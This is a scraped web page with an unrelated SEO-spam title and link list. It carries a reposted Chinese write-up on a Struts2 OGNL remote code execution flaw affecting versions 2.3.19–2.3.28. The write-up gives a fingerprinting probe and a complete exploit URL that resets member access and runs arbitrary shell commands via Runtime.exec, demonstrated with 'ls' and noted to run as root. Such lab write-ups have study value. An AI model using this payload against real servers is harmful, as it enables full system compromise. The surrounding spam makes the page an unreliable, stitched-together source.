当前位置: 首页 > news >正文

公司网站怎么做能被别人搜索到建设银行U盾不自己弹网站了

公司网站怎么做能被别人搜索到,建设银行U盾不自己弹网站了,手机软件制作网站平台,重庆论坛建站模板影响范围 Struts 2.3.19至2.3.20.2、2.3.21至2.3.24.1和2.3.25至2.3.28 当用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。 漏洞搭建 没有特殊要求,请看 (3…
影响范围

Struts 2.3.19至2.3.20.2、2.3.21至2.3.24.1和2.3.25至2.3.28

当用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。

漏洞搭建

没有特殊要求,请看

(3条消息) vulhub搭建方法_himobrinehacken的博客-CSDN博客
判断方式

检测 根目录参数?actionErrors=1111

如果返回的页面出现异常,则可以认定为目标是基于 Struts2 构建的。异常包括但不限于以下几种现象:

1、 页面直接出现 404 或者 500 等错误。

2、 页面上输出了与业务有关错误消息,或者 1111 被回显到了页面上。

3、 页面的内容结构发生了明显的改变。

4、 页面发生了重定向。

漏洞利用

exp

http://192.168.21.182:8080/memoindex.action? 
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setC 
haracterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23pa 
rameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23 
w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=ls

注意执行whoami时是root用户

http://www.yayakq.cn/news/190865/

相关文章:

  • 珠海哪里做网站的土石方工程网站
  • 黑龙江生产建设兵团网站app开发公司费用
  • 网站对于企业的制作主页的软件
  • 如何用群晖nas做网站微讯信息群号1000000
  • 本地建站教程番禺网站建设专家
  • 做律师网站的公司如何推广网站网站推广常用方法
  • 帮公司做网站的外包公司广汉市建设局网站
  • 网站建设中企动力怎么用wordpress做
  • 网站的元素html做的网站怎么弄
  • 成都制作网站价格安装wordpress遇到的安装页面空白问题
  • 自建网站做网上超市可行吗wordpress标题关键词
  • 明光网站建设抖音里做我女朋友网站
  • 立水桥网站建设网站策划书 范文
  • dede网站搬家国家企业查询网
  • 欧美网站欣赏邢台seo招聘
  • 兰溪网站建设学徒成都网站制作定制
  • 中山有哪些网站建立公司天津设计网站建设
  • 洛阳便宜网站建设公司个人网站备案名称 技巧
  • 为第三方网站做推广框架布局技术制作一个网站
  • 付运费送东西的网站怎么做6哪里可以大量找到广告主
  • 推广平台网站热狗网湛江做网站咨询电话
  • 上海房地产网站建设报价榆社县济南网站建设公司 大学
  • 类似美团网的网站是怎么做的广州市品牌网站建设平台
  • er图关于网站建设app开发定制的公司哪家好
  • 贵州省都匀市网站建设wordpress动作钩子
  • 网站 linux 服务器配置丰台网站开发公司
  • 国内网页设计网站图片加字在线制作
  • 做网站建设的有哪些冷水江网站定制
  • 成立网站的意义网站没备案可以做商城吗
  • 网站分析的数据来源有哪些做网站申请哪类商标